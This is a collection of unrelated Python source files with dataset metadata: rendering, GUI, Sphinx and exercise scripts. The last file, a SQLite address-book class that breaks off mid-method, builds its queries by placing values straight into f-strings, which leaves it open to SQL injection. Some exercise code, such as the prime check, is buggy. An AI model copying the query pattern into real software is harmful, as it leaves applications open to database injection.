cmake_cache_text:\n\n # Remove whitespace at the ends and start\n l = l.strip()\n\n # Remove lines that are comments\n if len(l) > 0 and not l.startswith(\"//\") and not l.startswith(\"#\"):\n # Extract our variable name from our values\n g = re.match(r\"([a-zA-Z_$][a-zA-Z_.$0-9-]*):(\\w+)=(.*)\", l).groups()\n\n # Store our value and split it into a list if it is a list\n cmake_cache[g[0]] = g[2] if \";\" not in g[2].strip(\";\") else g[2].strip(\";\").split(\";\")\n\n# Try to find our source and binary directories\ntry:\n binary_dir = cmake_cache[cmake_cache[\"CMAKE_PROJECT_NAME\"] + \"_BINARY_DIR\"]\nexcept KeyError:\n binary_dir = None\n\ntry:\n source_dir = cmake_cache[cmake_cache[\"CMAKE_PROJECT_NAME\"] + \"_SOURCE_DIR\"]\nexcept:\n source_dir = project_dir\n\nif __name__ == \"__main__\":\n\n # Root parser information\n command = argparse.ArgumentParser(\n description=\"This script is an optional helper script for performing common tasks for working with the NUClear roles system.\"\n )\n subcommands = command.add_subparsers(\n dest=\"command\", help=\"The command to run from the script. 
See each help for more information.\"\n )\n subcommands.required = True\n\n # Look through the various tools to see if we can find one that matches our arguments\n # If we do we don't need to load all the tools and can just trigger this one directly\n # This saves importing things we don't need\n for dirpath, dnames, fnames in os.walk(scripts_dir):\n for f in fnames:\n if f != \"__init__.py\" and f.endswith(\".py\"):\n\n # Check if this is the tool for the job\n components = os.path.relpath(os.path.join(dirpath, f[:-3]), scripts_dir).split(os.sep)\n if sys.argv[1 : len(components) + 1] == components:\n\n # Load the module\n module = pkgutil.find_loader(\".\".join(components)).load_module()\n if hasattr(module, \"register\") and hasattr(module, \"run\"):\n\n # Build up the base subcommands to this point\n subcommand = subcommands\n for c in components[:-1]:\n subcommand = subcommand.add_parser(c).add_subparsers(\n dest=\"{}_command\".format(c),\n help=\"Commands related to working with {} functionality\".format(c),\n )\n\n module.register(subcommand.add_parser(components[-1]))\n module.run(**vars(command.parse_args()))\n\n # We're done, exit\n exit(0)\n\n # If we reach this point, we couldn't find a tool to use.\n # In this case we need to look through all the tools so we can register them all.\n # This will provide a complete help for the function call so the user can try again\n tools = {}\n for importer, modname, ispkg in pkgutil.walk_packages([scripts_dir]):\n # Tools aren't in packages\n if not ispkg:\n\n # Load the modules and check it's a tool\n components = modname.split(\".\")\n try:\n module = pkgutil.find_loader(modname).load_module()\n if hasattr(module, \"register\") and hasattr(module, \"run\"):\n\n subcommand = subcommands\n tool = tools\n for c in components[:-1]:\n if c in tool:\n tool, subcommand = tool[c]\n else:\n subcommand = subcommand.add_parser(c).add_subparsers(\n dest=\"{}_command\".format(c),\n help=\"Commands related to working with {} functionality\".format(c),\n )\n subcommand.required = True\n tool[c] = ({}, subcommand)\n tool = tool[c][0]\n\n module.register(subcommand.add_parser(components[-1]))\n except ModuleNotFoundError as e:\n print(\"Could not load the tool '{}': {}\".format(modname.replace(\".\", \" \"), e))\n except BaseException as e:\n pass\n\n # Given what we know, this will fail here and give the user some help\n command.parse_args()\n","repo_name":"NUbots/NUWebots","sub_path":"scripts/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":5203,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"29725464295","text":"def solution(N: int, A: list):\n max_val, tmp_max = 0, 0\n result = [0] * N\n for item in A:\n if item > N:\n max_val = tmp_max\n else:\n if result[item - 1] < max_val:\n result[item - 1] = max_val + 1\n else:\n result[item - 1] += 1\n tmp_max = max(tmp_max, result[item - 1])\n for idx in range(len(result)):\n if result[idx] < max_val:\n result[idx] = max_val\n return result\n\n\nA = [3, 4, 4, 6, 1, 4, 4]\nN = 5\nassert solution(N, A) == [3, 2, 2, 4, 2]\n","repo_name":"Dopiz/Codility-Lessons","sub_path":"Lesson 4 - MaxCounters.py","file_name":"Lesson 4 - MaxCounters.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30061114472","text":"#Ask the user for their name and save as variable name\r\nname = input(\"What is your name?\")\r\n\r\n#Check if their name is frank or 
george\r\nif name == \"frank\" or name == \"george\":\r\n\r\n #say hello\r\n print(\"Hello\" + \" \" + name)\r\n\r\n#if their name is not frank or george\r\nelse:\r\n\r\n #Say no\r\n print(\"Sorry, you cannot access the system\")","repo_name":"HBlack09/ICTPRG-Python","sub_path":"Introduction to Selection Quiz/Question 1.py","file_name":"Question 1.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27909999544","text":"import imageio\r\n\r\n# models\r\nfrom models import *\r\nfrom renderer import *\r\nfrom data.ray_utils import get_rays\r\nfrom scipy.spatial.transform import Rotation as R\r\n\r\nfrom tqdm import tqdm\r\n\r\n# pytorch-lightning\r\n\r\nfrom data.ray_utils import ray_marcher\r\nfrom data.llff import LLFFDataset\r\n\r\ntorch.cuda.set_device(0)\r\nos.environ['CUDA_VISIBLE_DEVICES'] = '0'\r\n\r\n\r\ndef decode_batch(batch):\r\n rays = batch['rays'] # (B, 8)\r\n rgbs = batch['rgbs'] # (B, 3)\r\n return rays, rgbs\r\n\r\n\r\ndef unpreprocess(data, shape=(1, 1, 3, 1, 1)):\r\n # to unnormalize image for visualization\r\n # data N V C H W\r\n device = data.device\r\n mean = torch.tensor([-0.485 / 0.229, -0.456 / 0.224, -0.406 / 0.225]).view(*shape).to(device)\r\n std = torch.tensor([1 / 0.229, 1 / 0.224, 1 / 0.225]).view(*shape).to(device)\r\n\r\n return (data - mean) / std\r\n\r\n\r\ndef normalize(x):\r\n return x / np.linalg.norm(x, axis=-1, keepdims=True)\r\n\r\n\r\ndef viewmatrix(z, up, pos):\r\n vec2 = normalize(z)\r\n vec1_avg = up\r\n vec0 = normalize(np.cross(vec1_avg, vec2))\r\n vec1 = normalize(np.cross(vec2, vec0))\r\n m = np.eye(4)\r\n m[:3] = np.stack([vec0, vec1, vec2, pos], 1)\r\n return m\r\n\r\n\r\ndef ptstocam(pts, c2w):\r\n tt = np.matmul(c2w[:3, :3].T, (pts - c2w[:3, 3])[..., np.newaxis])[..., 0]\r\n return tt\r\n\r\n\r\ndef poses_avg(poses):\r\n center = poses[:, :3, 3].mean(0)\r\n vec2 = normalize(poses[:, :3, 2].sum(0))\r\n up = poses[:, :3, 1].sum(0)\r\n c2w = viewmatrix(vec2, up, center)\r\n\r\n return c2w\r\n\r\n\r\ndef render_path_spiral(c2w, up, rads, focal, zdelta, zrate, N_rots=2, N=120):\r\n render_poses = []\r\n rads = np.array(list(rads) + [1.])\r\n\r\n for theta in np.linspace(0., 2. * np.pi * N_rots, N + 1)[:-1]:\r\n c = np.dot(c2w[:3, :4], np.array([np.cos(theta), -np.sin(theta), -np.sin(theta * zrate), 1.]) * rads)\r\n z = normalize(c - np.dot(c2w[:3, :4], np.array([0, 0, -focal, 1.])))\r\n render_poses.append(viewmatrix(z, up, c))\r\n return render_poses\r\n\r\n\r\ndef get_spiral(c2ws_all, near_far, rads_scale=0.5, N_views=120):\r\n # center pose\r\n c2w = poses_avg(c2ws_all)\r\n\r\n # Get average pose\r\n up = normalize(c2ws_all[:, :3, 1].sum(0))\r\n\r\n # Find a reasonable \"focus depth\" for this dataset\r\n close_depth, inf_depth = near_far\r\n dt = .75\r\n mean_dz = 1. / (((1. 
- dt) / close_depth + dt / inf_depth))\r\n focal = mean_dz\r\n\r\n # Get radii for spiral path\r\n zdelta = close_depth * .2\r\n tt = c2ws_all[:, :3, 3] - c2w[:3, 3][None]\r\n rads = np.percentile(np.abs(tt), 70, 0) * rads_scale\r\n render_poses = render_path_spiral(c2w, up, rads, focal, zdelta, zrate=.5, N=N_views)\r\n return np.stack(render_poses)\r\n\r\n\r\ndef position2angle(position):\r\n ''' nx3 '''\r\n position = normalize(position)\r\n theta = np.arccos(position[:, 2]) / np.pi * 180\r\n phi = np.arctan2(position[:, 1], position[:, 0]) / np.pi * 180\r\n return [theta, phi]\r\n\r\n\r\ndef pose_spherical_nerf(euler, radius=4.0):\r\n c2ws_render = np.eye(4)\r\n c2ws_render[:3, :3] = R.from_euler('xyz', euler, degrees=True).as_matrix()\r\n c2ws_render[:3, 3] = c2ws_render[:3, :3] @ np.array([0.0, 0.0, -radius])\r\n return c2ws_render\r\n\r\n\r\ndef nerf_video_path(c2ws, theta_range=10, phi_range=20, N_views=120):\r\n rotvec = []\r\n for i in range(c2ws.shape[0]):\r\n r = R.from_matrix(c2ws[i, :3, :3])\r\n euler_ange = r.as_euler('xyz', degrees=True).reshape(1, 3)\r\n if i:\r\n mask = np.abs(euler_ange - rotvec[0]) > 180\r\n euler_ange[mask] += 360.0\r\n rotvec.append(euler_ange)\r\n rotvec = np.mean(np.stack(rotvec), axis=0)\r\n render_poses = [pose_spherical_nerf(rotvec + np.array([angle, 0.0, -phi_range]), 4.0) for angle in\r\n np.linspace(-theta_range, theta_range, N_views // 4, endpoint=False)]\r\n render_poses += [pose_spherical_nerf(rotvec + np.array([theta_range, 0.0, angle]), 4.0) for angle in\r\n np.linspace(-phi_range, phi_range, N_views // 4, endpoint=False)]\r\n render_poses += [pose_spherical_nerf(rotvec + np.array([angle, 0.0, phi_range]), 4.0) for angle in\r\n np.linspace(theta_range, -theta_range, N_views // 4, endpoint=False)]\r\n render_poses += [pose_spherical_nerf(rotvec + np.array([-theta_range, 0.0, angle]), 4.0) for angle in\r\n np.linspace(phi_range, -phi_range, N_views // 4, endpoint=False)]\r\n render_poses = torch.from_numpy(np.stack(render_poses)).float().to(device)\r\n return render_poses\r\n\r\ndef render_video(args):\r\n for i_scene, scene in enumerate([args.datadir.split('/')[-1]]):\r\n if args.is_finetuned:\r\n args.ckpt = f'./runs_fine_tuning/{scene}/ckpts/latest.tar'\r\n args.video_name = 'DSft_'\r\n else:\r\n args.video_name = ''\r\n\r\n args.use_viewdirs = True\r\n args.feat_dim = 8 + 3 * 4\r\n\r\n # create models\r\n if i_scene == 0 or args.is_finetuned:\r\n # Create nerf model\r\n render_kwargs_train, render_kwargs_test, start, grad_vars = \\\r\n create_nerf_mvs(args, use_mvs=True, dir_embedder=False, pts_embedder=True)\r\n filter_keys(render_kwargs_train)\r\n # Create mvs model\r\n MVSNet = render_kwargs_train['network_mvs']\r\n render_kwargs_train.pop('network_mvs')\r\n\r\n datatype = 'val'\r\n pad = 24 # the padding value should be same as your finetuning ckpt\r\n args.chunk = 5120\r\n\r\n dataset = LLFFDataset(args, split=datatype)\r\n\r\n save_dir = f'./results'\r\n os.makedirs(save_dir, exist_ok=True)\r\n MVSNet.train()\r\n MVSNet = MVSNet.cuda()\r\n\r\n with torch.no_grad():\r\n\r\n c2ws_all = dataset.poses\r\n\r\n if args.is_finetuned:\r\n # large baseline\r\n imgs_source, proj_mats, near_far_source, pose_source = dataset.read_source_views(device=device)\r\n volume_feature = torch.load(args.ckpt)['volume']['feat_volume']\r\n volume_feature = RefVolume(volume_feature.detach()).cuda()\r\n\r\n pad *= args.imgScale_test\r\n pair_idx = torch.load('configs/pairs.th')[f'{scene}_train']\r\n c2ws_render = get_spiral(c2ws_all[pair_idx], 
near_far_source, rads_scale=0.6,\r\n N_views=180) # you can enlarge the rads_scale if you want to render larger baseline\r\n else:\r\n # neighboring views with position distance\r\n imgs_source, proj_mats, near_far_source, pose_source = dataset.read_source_views(device=device)\r\n volume_feature, _, _ = MVSNet(imgs_source, proj_mats, near_far_source, pad=pad, lindisp=args.use_disp)\r\n\r\n pad *= args.imgScale_test\r\n pair_idx = torch.load('configs/pairs.th')[f'{scene}_train']\r\n c2ws_render = get_spiral(c2ws_all[pair_idx], near_far_source, rads_scale=0.6,\r\n N_views=180) # you can enlarge the rads_scale if you want to render larger baseline\r\n\r\n c2ws_render = torch.from_numpy(np.stack(c2ws_render)).float().to(device)\r\n\r\n imgs_source = unpreprocess(imgs_source)\r\n\r\n try:\r\n tqdm._instances.clear()\r\n except Exception:\r\n pass\r\n\r\n frames = []\r\n img_directions = dataset.directions.to(device)\r\n for i, c2w in enumerate(tqdm(c2ws_render)):\r\n torch.cuda.empty_cache()\r\n\r\n rays_o, rays_d = get_rays(img_directions, c2w) # both (h*w, 3)\r\n rays = torch.cat([rays_o, rays_d,\r\n near_far_source[0] * torch.ones_like(rays_o[:, :1]),\r\n near_far_source[1] * torch.ones_like(rays_o[:, :1])],\r\n 1).to(device) # (H*W, 3)\r\n\r\n N_rays_all = rays.shape[0]\r\n rgb_rays, depth_rays_preds = [], []\r\n for chunk_idx in range(N_rays_all // args.chunk + int(N_rays_all % args.chunk > 0)):\r\n xyz_coarse_sampled, rays_o, rays_d, z_vals = ray_marcher(\r\n rays[chunk_idx * args.chunk:(chunk_idx + 1) * args.chunk],\r\n N_samples=args.N_samples, lindisp=args.use_disp)\r\n\r\n # Converting world coordinate to ndc coordinate\r\n H, W = imgs_source.shape[-2:]\r\n inv_scale = torch.tensor([W - 1, H - 1]).to(device)\r\n w2c_ref, intrinsic_ref = pose_source['w2cs'][0], pose_source['intrinsics'][0].clone()\r\n xyz_NDC = get_ndc_coordinate(w2c_ref, intrinsic_ref, xyz_coarse_sampled, inv_scale,\r\n near=near_far_source[0], far=near_far_source[1], pad=pad,\r\n lindisp=args.use_disp)\r\n\r\n # rendering\r\n rgb, disp, acc, depth_pred, alpha, extras = rendering(args, pose_source, xyz_coarse_sampled,\r\n xyz_NDC, z_vals, rays_o, rays_d,\r\n volume_feature, imgs_source,\r\n **render_kwargs_train)\r\n\r\n rgb, depth_pred = torch.clamp(rgb.cpu(), 0, 1.0).numpy(), depth_pred.cpu().numpy()\r\n rgb_rays.append(rgb)\r\n depth_rays_preds.append(depth_pred)\r\n\r\n depth_rays_preds = np.concatenate(depth_rays_preds).reshape(H, W)\r\n depth_rays_preds, _ = visualize_depth_numpy(depth_rays_preds, near_far_source)\r\n\r\n rgb_rays = np.concatenate(rgb_rays).reshape(H, W, 3)\r\n H_crop, W_crop = np.array(rgb_rays.shape[:2]) // 20\r\n rgb_rays = rgb_rays[H_crop:-H_crop, W_crop:-W_crop]\r\n depth_rays_preds = depth_rays_preds[H_crop:-H_crop, W_crop:-W_crop]\r\n img_vis = np.concatenate((rgb_rays * 255, depth_rays_preds), axis=1)\r\n\r\n frames.append(img_vis.astype('uint8'))\r\n\r\n imageio.mimwrite(f'{save_dir}/{args.video_name}{scene}.mov', np.stack(frames), fps=30, quality=10)\r\n os.system(f\"ffmpeg -i {save_dir}/{args.video_name}{scene}.mov -vcodec h264 -acodec mp2 {save_dir}/{args.video_name}{scene}.mp4\")\r\n os.system(f\"rm {save_dir}/{args.video_name}{scene}.mov\")\r\n\r\n","repo_name":"Yuchen-Song/DS-MVSNeRF","sub_path":"render_video.py","file_name":"render_video.py","file_ext":"py","file_size_in_byte":10482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19326058906","text":"import os\nfrom docutils import nodes\nfrom docutils.statemachine 
import ViewList\nfrom sphinx.util.docutils import SphinxDirective\nfrom sphinx.util.nodes import nested_parse_with_titles\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\nwith open('{}/example.rst.tmpl'.format(dir_path), 'r') as f:\n lines = f.readlines()\n\n\ndef make_example(dir):\n path = '../../examples/{0}/{0}'.format(dir)\n rst = ViewList()\n line_no = 0\n for line in lines:\n line_no += 1\n line = line.format(path).rstrip()\n rst.append(line, 'example.rst', line_no)\n return rst\n\n\nclass ExampleDirective(SphinxDirective):\n has_content = True\n\n def run(self):\n dir = self.content[0]\n rst = make_example(dir)\n node = nodes.section()\n node.document = self.state.document\n nested_parse_with_titles(self.state, rst, node)\n return node.children\n\n\ndef setup(app):\n app.add_directive('example', ExampleDirective)\n return {\n 'parallel_read_safe': True,\n 'parallel_write_safe': True,\n }\n","repo_name":"udondan/iam-floyd","sub_path":"docs/source/extensions/example/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":524,"dataset":"github-code","pt":"53"} +{"seq_id":"9662906338","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 14 13:22:32 2017\n\n@author: Kozmik\n\"\"\"\n\nimport DateTools as DT\nfrom os.path import abspath\nfrom os.path import exists\nfrom os.path import join\nfrom os import listdir\nfrom os import rename\nfrom os import mkdir\nfrom os import remove\nfrom os import rmdir\nfrom shutil import copy\nfrom subprocess import Popen\nimport PIL.Image as PI\nfrom PIL import ImageTk\nfrom tkinter import filedialog as filedialog\nfrom tkinter import messagebox as messagebox\nimport tkinter as tk\nimport tkinter.ttk as ttk\n\nclass AttachmentManager(tk.Frame):\n def __init__(self, master, controller, jobject, jentry, **kw):\n self.master = master\n self.controller = controller\n self.journal = jobject\n self.entry = jentry\n self.args = kw\n self.all_attachments = []\n self.dialog = None\n self.frame = None\n self.DELETE = None\n self.buttonlist = None\n self.delete_icon = None\n \n self.trashcan = join(self.args['homepath'], 'Resources\\\\Trash_Can-512.png')\n self.app_icon = join(self.args['homepath'], 'Resources\\\\web.ico')\n self.parentpath = join(self.args['homepath'], 'Attachments\\\\') \n try:\n mkdir(self.parentpath)\n except FileExistsError:\n pass\n self.temppath = self.parentpath + 'temp\\\\'\n self.currentpath = self.temppath\n# try:\n# mkdir(self.currentpath)\n# except FileExistsError:\n if exists(abspath(self.currentpath)):\n self.delete()\n \n ttk.Frame.__init__(self, self.master)\n self.NEW = ttk.Button(self, takefocus=0, style='UI.TButton', \n text='Add Attachment', \n command=self.askForAttachment)\n self.DISPLAY = ttk.Button(self, takefocus=0, style='UI.TButton', \n text='Display Attachments', \n command=self.displayAttachments, \n state=tk.DISABLED)\n self.NEW.pack(fill=tk.X)\n self.DISPLAY.pack(fill=tk.X)\n \n def updateGUI(self, jentry):\n \"\"\"Checks to see if the current JEntry has attachments and aligns variables, if so.\n Has exclusive control to generation of 'temp' folder.\"\"\"\n self.all_attachments = []\n if exists(self.temppath):\n self.current = self.temppath\n self.delete()\n self.DISPLAY.config(state=tk.DISABLED)\n self.entry = jentry\n date = self.entry.getDate()\n if date:\n attachments = self.entry.getAttachments()\n path = self.parentpath + DT.getDateFileStorageFormat(date) + '\\\\'\n filepath = exists(path)\n if not attachments 
and not filepath:\n self.currentpath = self.temppath\n mkdir(self.currentpath)\n elif attachments and not filepath:\n message = 'The directory for this journal entry could not be ' +\\\n 'located. Do you want the application to create a new ' +\\\n 'directory with a list of the missing files?'\n# if len(attachments) > 1:\n# message = 'The directory for this journal entry could ' +\\\n# 'not be located. The following attachments are missing: '\n# message += attachments[0] + '. Do you want to restore them?'\n# for item in range(1, len(attachments)):\n# message += ', ' + attachments[item]\n# else:\n# message = 'The directory for this journal entry could ' +\\\n# 'not be located. The following attachment is missing: '\n# message += attachments[0] + '. Do you want to restore it?'\n choice = messagebox.askyesno(title='Missing Directory', \n message=message)\n if choice:\n self.currentpath = path\n mkdir(self.currentpath)\n# self.askForAttachment()\n path = join(self.currentpath, 'Missing Files.txt')\n file = open(path, 'w+')\n for item in attachments:\n file.write(item + '\\n\\n')\n file.close()\n# message = 'The list of missing files can be found at:\\n\\n' +\\\n# self.currentpath\n# messagebox.showinfo()\n Popen(r'explorer /select, ' + '\"\"' + path + '\"\"')\n else:\n for item in attachments:\n self.entry.deleteAttachment(item)\n self.currentpath = self.temppath\n mkdir(self.currentpath)\n self.DISPLAY.config(state=tk.DISABLED)\n else:\n self.currentpath = path\n check = self.scanForAdditions()\n if check:\n attachments = self.entry.getAttachments()\n self.DISPLAY.config(state=tk.NORMAL)\n for filename in attachments:\n self.all_attachments.append(self.currentpath + \n filename)\n else:\n self.currentpath = self.temppath\n self.DISPLAY.config(state=tk.DISABLED)\n mkdir(self.currentpath) \n \n def addAttachment(self, pathtuple):\n for filepath in pathtuple:\n filepath = filepath.replace('/', '\\\\')\n if filepath not in self.all_attachments:\n self.all_attachments.append(filepath)\n copy(filepath, self.currentpath)\n# folder = listdir(self.currentpath)\n# entry = self.entry.getAttachments()\n# for file in folder:\n# if file not in entry:\n# self.entry.addAttachment(file)\n self.DISPLAY.config(state=tk.NORMAL)\n \n def askForAttachment(self):\n options = {}\n options['initialdir'] = self.currentpath\n options['parent'] = self.controller\n options['title'] = 'Select a file to add'\n items = filedialog.askopenfilenames(**options)\n if items:\n self.addAttachment(items)\n \n def scanForAdditions(self):\n \"\"\"[For later.] 
Allows manual addition of attachments that will be added \n to associated folder upon opening the JEntry.\"\"\"\n new = listdir(self.currentpath)\n old = self.entry.getAttachments()\n if old != new:\n for item in new:\n if item not in old:\n self.entry.addAttachment(item)\n return True\n else:\n return False\n# self.updateGUI(self.entry)\n \n def displayAttachments(self):\n self.buttonlist = []\n \n if self.all_attachments:\n self.dialog = tk.Toplevel(bg=self.args['bgcolor1'])\n self.dialog.title('Attachments')\n self.dialog.iconbitmap(self.app_icon)\n self.dialog.maxsize(width=self.dialog.winfo_screenwidth(), \n height=self.dialog.winfo_screenheight())\n self.dialog.minsize(width=250, height=70)\n \n self.frame = ttk.Frame(self.dialog)\n bottomframe = ttk.Frame(self.dialog)\n \n for filepath in self.all_attachments:\n path = abspath(filepath)\n command = r'explorer /select, ' + '\"\"' + path + '\"\"'\n button = ttk.Button(self.frame, style='UI.TButton', \n text=filepath.rsplit('\\\\', 1)[1], \n command=lambda c=command: Popen(c))\n self.buttonlist.append([button, \n tk.BooleanVar(self.frame, False, \n button.cget('text')), \n path])\n button.pack(expand=1, fill='x', pady=2)\n self.DELETE = ttk.Button(bottomframe, takefocus=0, \n style='Bold.UI.TButton', \n text='Delete', \n command=self.deleteAttachment)\n self.DELETE.pack(side='right', expand=True, fill='x')\n self.frame.pack(side='top')\n bottomframe.pack(side='top', pady=4)\n self.dialog.grab_set()\n \n self.dialog.protocol('WM_DELETE_WINDOW', self.destroyDialog)\n \n else:\n message = \"There are no attachments for this entry!\"\n messagebox.showinfo(title='Attachments', message=message)\n \n def deleteAttachment(self):\n for item in self.frame.pack_slaves():\n item.pack_forget()\n self.dialog.title('Delete')\n \n for item in self.buttonlist:\n checkbutton = ttk.Checkbutton(self.frame, \n text=item[0].cget('text'), \n var=item[1])\n checkbutton.pack(side=tk.TOP, expand=True, fill=tk.X, pady=2)\n \n w = self.DELETE.winfo_width()\n h = self.DELETE.winfo_height()\n if not self.delete_icon:\n# iconpath = self.parentpath.rsplit('\\\\Attachments',1)[0] + \\\n# '\\\\Resources\\\\Trash_Can-512.png'\n self.delete_icon = PI.open(self.trashcan)\n self.delete_icon.thumbnail((h-2,h-2))\n self.delete_icon = ImageTk.PhotoImage(self.delete_icon)\n self.DELETE.config(command=self.refreshDialog, text='', \n image=self.delete_icon, width=w)\n self.DELETE.pack()\n\n def delete(self):\n \"\"\"Deletes the folder associated with the entry.\"\"\"\n try:\n items = listdir(self.currentpath)\n for item in items:\n remove(self.currentpath + item)\n rmdir(self.currentpath)\n except FileNotFoundError:\n pass\n \n def refreshDialog(self):\n deletelist = []\n for i in range(len(self.buttonlist)):\n button = self.buttonlist[i]\n if button[1].get():\n deletelist.append(i)\n if deletelist:\n if len(deletelist) > 1:\n message = \"This will delete previously saved attachments from your journal storage.\"\\\n \" If you want to keep any of the attachments, press \\\"Cancel\\\" and copy \"\\\n \"them elsewhere. Then, return here to finish deleting.\\n\\n\"\\\n \"Are you sure you want to delete them?\"\n else:\n message = \"This will delete the selected attachment from your \"\\\n \"computer. If you want to keep the attachment, press \\\"Cancel\\\" \"\\\n \"and copy the attachment elsewhere. 
Then, return here to \"\\\n \"delete it.\\n\\n Are you sure you want to delete it?\"\n choice = messagebox.askokcancel(title='Are You Sure?', message=message)\n if choice:\n for d in deletelist:\n path = self.buttonlist[d][2]\n# filename = self.buttonlist[d][0].cget('text')\n# filepath = abspath(self.currentpath+filename)\n# if filepath == self.buttonlist[d][2]:\n# try:\n# remove(filepath)\n# except FileNotFoundError:\n# pass\n# if filepath in self.old_attachments:\n# self.old_attachments.remove(filepath)\n# else:\n# filepath = self.buttonlist[d][2]\n# if filepath in self.new_attachments:\n# self.new_attachments.remove(filepath)\n try:\n remove(path)\n except FileNotFoundError:\n pass\n self.entry.deleteAttachment(filename = \n self.buttonlist[d][0].cget('text'))\n self.all_attachments.remove(path)\n self.destroyDialog()\n \n def destroyDialog(self):\n self.dialog.destroy()\n self.dialog = None\n self.frame = None\n for item in self.buttonlist:\n item[0].destroy()\n self.buttonlist = None\n if not self.all_attachments:\n self.delete()\n self.updateGUI(self.entry)\n# self.DISPLAY.config(state=tk.DISABLED)\n# rmdir(self.currentpath)\n \n def clearGUI(self, jentry):\n self.entry = jentry\n self.all_attachments = []\n self.currentpath = self.temppath\n self.delete()\n# mkdir(self.currentpath)\n# self.new_attachments = []\n \n def save(self):\n \"\"\"Saves the attachments and renames the 'temp' folder to the date.\n Has exclusive control over generation of JEntry-associated folders.\n Assumes that the JEntry object already has a date\"\"\"\n src = self.temppath\n date = self.entry.getDate()\n dest = self.parentpath + DT.getDateFileStorageFormat(date)\n# tmp = False\n old = self.entry.getAttachments()\n# if not old:\n if exists(src):\n# tmp = True\n new = listdir(src)\n if new:\n for item in new:\n if item not in old:\n self.entry.addAttachment(item)\n rename(src, dest)\n else:\n folder = listdir(dest)\n for file in folder:\n if file not in old:\n self.entry.addAttachment(file)\n# self.delete()\n# src = self.currentpath\n# if new and tmp:\n \n# if self.all_attachments:\n# try:\n# mkdir(path)\n# except FileExistsError:\n# pass\n# for filepath in self.new_attachments:\n# copy(filepath, path)\n# f = filepath.rsplit('\\\\',1)[1]\n# self.entry.addAttachment(f)\n# tmp = self.entry.getAttachments()\n# self.old_attachments = []\n# for filename in tmp:\n# self.old_attachments.append(self.currentpath+filename) \n# self.new_attachments = []\n\n def clean(self):\n self.currentpath = self.temppath\n if exists(self.currentpath):\n check = listdir(self.currentpath)\n if check:\n message = 'There are files left in ' + self.currentpath + '. 
If you wish to '\\\n 'move them, do so before clicking \\\"OKAY\\\".'\n messagebox.showwarning(title='Unsaved files', message=message)\n self.delete()","repo_name":"kozmik-moore/kunnekted-jurnl","sub_path":"AttachmentTools.py","file_name":"AttachmentTools.py","file_ext":"py","file_size_in_byte":14922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70636061610","text":"#factorial\r\ndef fact(n):\r\n f=1\r\n for i in range(1,n+1):\r\n f*=i\r\n return f\r\n\r\nn=int(input())\r\nr=int(input())\r\n\r\nn_fact=fact(n)\r\nr_fact=fact(r)\r\nnr_fact=fact((n-r))\r\nc=n_fact//(r_fact*nr_fact)\r\nprint(c)\r\n\r\n #prime no\r\ndef isprime(n):\r\n for i in range(2,n):\r\n if n%i==0:\r\n break\r\n else:\r\n return True\r\n return False\r\n\r\nn=int(input())\r\na=isprime(n)\r\nif a:\r\n print(\"Prime\")\r\nelse:\r\n print(\"Not Prime\")\r\n\r\n#all prime no b/w 2 to n\r\nn=int(input())\r\nfor i in range(2,n+1):\r\n a=isprime(i)\r\n if a:\r\n print(i,\" Prime\")\r\n else:\r\n print(i,\" Not Prime\")\r\n\r\n\r\n#prime in range 2 to n\r\ndef isprimerange(n):\r\n for i in range(2,n+1):\r\n for j in range(2,i):\r\n if i%j==0:\r\n break\r\n else:\r\n print(i)\r\n\r\nn=int(input())\r\nisprimerange(n)\r\n\r\n\r\n#prime in range 2 to n\r\ndef isprime(n):\r\n for i in range(2,n):\r\n if n%i==0:\r\n break\r\n else:\r\n return True\r\n return False\r\n\r\ndef isprimerange(n):\r\n for i in range(2,n+1):\r\n a=isprime(i)\r\n if a:\r\n print(i)\r\n\r\nn=int(input())\r\nisprimerange(n)","repo_name":"AbhisheKumar1616/Introduction-to-Python","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36424990103","text":"\"\"\" Python modules\n logging: logs\n geodesic: distance between 2 points\n\"\"\"\nimport logging\nimport sqlite3\nfrom geopy.distance import geodesic\n\n\nfrom src.db_connection import database_connection_cursor\n\nlogging.basicConfig(level=logging.INFO, filename=\"logs/db_connection.log\",\n format=\" %(asctime)s - %(levelname)s - %(message)s\")\n\n\n# Connecting database and receiving conn and cursor object\ndb_conn, db_curr = database_connection_cursor()\n\n\nclass Address:\n \"\"\"\n Address class for UserAddress\n \"\"\"\n def __init__(self, address_name=None, coordinates=None):\n self.address_name = address_name\n self.coordinates = coordinates\n\n def create_address(self):\n \"\"\"\n Method to create/add address into Database\n Error Convention:\n 1500: same address_name\n \"\"\"\n\n addrs = set()\n ids = self.get_address_ids()\n for addr in ids:\n addrs.add(addr[0])\n if self.address_name in addrs:\n return 1500\n\n del addrs\n\n query = f\"\"\" INSERT INTO address_book VALUES\n ('{self.address_name}','{self.coordinates}')\"\"\"\n\n try:\n logging.info(db_curr.execute(query))\n except sqlite3.Error as err:\n logging.error(err)\n\n self.commit()\n\n return True\n\n def delete_address(self, query_address_name):\n \"\"\"Method to delete a address in the DB by name\n \"\"\"\n addrs = set()\n ids = self.get_address_ids()\n\n for addr in ids:\n addrs.add(addr[0])\n\n if query_address_name not in addrs:\n return False\n del addrs\n\n query = f\"\"\"\n DELETE FROM address_book WHERE\n address_name ='{query_address_name}';\n \"\"\"\n try:\n db_curr.execute(query)\n self.commit()\n return True\n except sqlite3.Error as err:\n logging.error(err)\n\n def update_address(self):\n \"\"\"Method to update a 
